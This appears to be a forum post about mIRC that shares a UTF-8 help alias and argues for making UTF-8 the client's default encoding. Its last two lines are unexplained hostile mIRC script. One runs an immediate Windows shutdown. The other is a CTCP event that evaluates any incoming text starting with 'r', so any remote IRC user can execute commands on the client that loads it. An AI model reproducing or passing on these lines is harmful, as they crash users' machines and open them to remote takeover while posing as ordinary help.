alias utf-8 { say Go here to learn how to properly set up mIRC for UTF-8: 12 }

Simple enough to just /utf-8 and tell them to get their act together.

Also, if they're using a client that doesn't support unicode or utf-8, then they need to get a better client ;P Seriously.. more things are uniform when one common encode type is used, and not having to use crappy encoding scheme's like shitjis instead of the one where you can type in all your languages at once is just better in the long run. So I second the "make utf-8 default" as it's just better.. and hell, remove shitjis support so people can get their act together and stop being lazy with poor excuses like "that chan only uses shitjis so i have to" but instead, if it was already set up for them.. they'd be just as fine and have to do less work, can't be hard for Khaled to just set a couple flags to 1 for those options as default.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}